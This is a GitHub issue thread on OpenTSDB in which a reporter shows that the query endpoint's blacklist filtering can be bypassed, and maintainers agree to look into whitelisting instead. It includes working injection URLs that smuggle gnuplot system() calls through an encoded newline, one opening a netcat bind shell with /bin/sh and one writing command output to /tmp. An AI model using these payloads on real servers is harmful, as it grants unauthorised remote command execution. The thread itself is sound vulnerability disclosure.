OpenTSDB / opentsdb

A scalable, distributed Time Series Database.
http://opentsdb.net
GNU Lesser General Public License v2.1
4.98k stars 1.25k forks

parameters need filtering again #3 #996

Open gsocgsoc opened 7 years ago

gsocgsoc commented 7 years ago

Hi,

Sorry for being a pain in the ass, but can't we just whitelist the desired input instead of blacklisting? There will always be ways around the blacklist.

Here's an example from a quick test only: xxx.com:4242/q?start=2017/06/12-09:44:00&end=2017/06/12-09:54:51&m=sum:jmxdata.cpu&o=&yrange=[0:]%0Asystem(sprintf("nc -lvp 1234 -e /bin/sh"))&wxh=1900x772&style=linespoint&json

The output of that is written to /tmp/opentsdb/xxxxxx.out, but you can create a bind shell easily, as seen above.

There are most likely at least a couple more ways of doing it.

Related issues: #953 #781

manolama commented 7 years ago

Arg, why is security hard! Heh, no, thank you for looking. I would prefer the whitelist, just didn't have time to dig through the possible options. I'll leave this open to get to it.

gsocgsoc commented 6 years ago

Just tried on the latest opentsdb-2.4.0RC2, still vulnerable.

http://xxx.com:4242/q?start=2018/01/29-15:51:00&end=2018/01/29-16:01:07&m=sum:jmxdata.heap{host=*}&o=&yrange=[0:]&wxh=1900x771&style=linespoint%0Asystem%20%22id%20%3E/tmp/jalla.txt%22&json

Don't leave any of your boxes open on the internet.

johann8384 commented 6 years ago

Don't leave your boxes open on the internet either way! :) Thanks for checking, I will look into it more.

On Mon, Jan 29, 2018 at 9:48 AM, gsoc notifications@github.com wrote: